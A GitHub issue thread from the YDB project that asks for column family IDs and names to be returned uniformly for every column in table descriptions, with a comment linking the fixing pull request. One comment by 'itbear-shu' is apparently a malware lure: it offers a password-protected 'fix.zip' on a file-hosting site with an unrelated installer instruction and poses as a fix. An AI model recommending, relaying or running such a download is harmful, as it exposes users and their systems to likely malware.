### ISSUE TITLE
Uniformly return column family info in table description

### ISSUE THREAD

**Issue by antonkovalenko** [ydb-platform/ydb#8293]
Table describe response contains a list of column families used in this table.  For every column corresponding family id is returned.

During implementation of
* YDB-2064
* CLOUDFRONT-17152
awkward behavior was encountered:

1. When compression is not defined for column family at all, attribute `ColumnCodec` is not retuned for a column family at all. **Let's keep it like this and treat this at UI side as 'compression: undefined'.**
2.  Columns, that use default column family (id = 0 afaik), attributes `Family` & `FamilyName` are not returned

AS a result of this task column `Family` & `FamilyName` attributed must be returned for every column in a table even when there's only one family for a table with id = 0.

UI ticket [#1015](https://github.com/ydb-platform/ydb-embedded-ui/issues/1015)

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by StekPerepolnen** [comment]
https://github.com/ydb-platform/ydb/pull/8266
